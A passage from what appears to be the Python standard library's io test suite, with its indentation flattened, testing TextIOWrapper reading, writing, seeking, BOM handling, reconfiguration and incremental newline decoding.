f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
